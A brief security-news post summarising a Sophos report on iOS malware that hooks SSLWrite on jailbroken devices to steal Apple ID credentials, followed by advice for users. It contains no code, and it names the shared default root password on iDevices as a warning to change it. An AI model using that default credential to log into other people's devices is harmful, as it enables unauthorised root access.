Active malware campaign Security researchers have uncovered an active malware campaign in the wild that steals the Apple ID credentials from jailbroken iPhones and iPads..
On the SophosLabs site there is an article about this new attack “Unflod Baby Panda”
This malware will do the following :
Hooks the SSLWrite function
When loaded and initialised, the Unflod library hooks the SSLWrite function, used when sending encrpyted data over a secure connection.
That means the malware gets to peek at confidential data before it is encryption for transmission.
then it Watches out for the presence of AppleID credential data.
Uploads credential data it finds to one of two hardcoded IP addresses
What to do?
If you haven’t jailbroken your iOS device, you don’t need to worry.
If you are a jailbreaker and you have been circumspect in what you choose to install, you probably don’t need to worry.
Nevertheless, just in case, Sophos products detect this malware as iPh/PWS-CFX.
Of course, because a proper anti-virus isn’t possible on an unjailbroken iOS device (though, by the same token, malware is in general very unlikely on such devices), there isn’t such a thing as Sophos Anti-Virus for iOS.
So, if you want to scan your iPhone or iPad, you’ll need to install software that lets you access the files on iDevice remotely so you can scan them with an anti-virus on your desktop or laptop computer.
And to do that you’ll need to jailbreak your iDevice…
PS. If you allow remote access to your iDevice by installing the SSH daemon, don’t forget that Apple gives the accounts root and mobile the same password on all iDevices (it’s “alpine”, and yes, hard-wired passwords are a terrible idea). So if you enable sshd, you must change the password on those accounts, as explained here.
The full article is posted here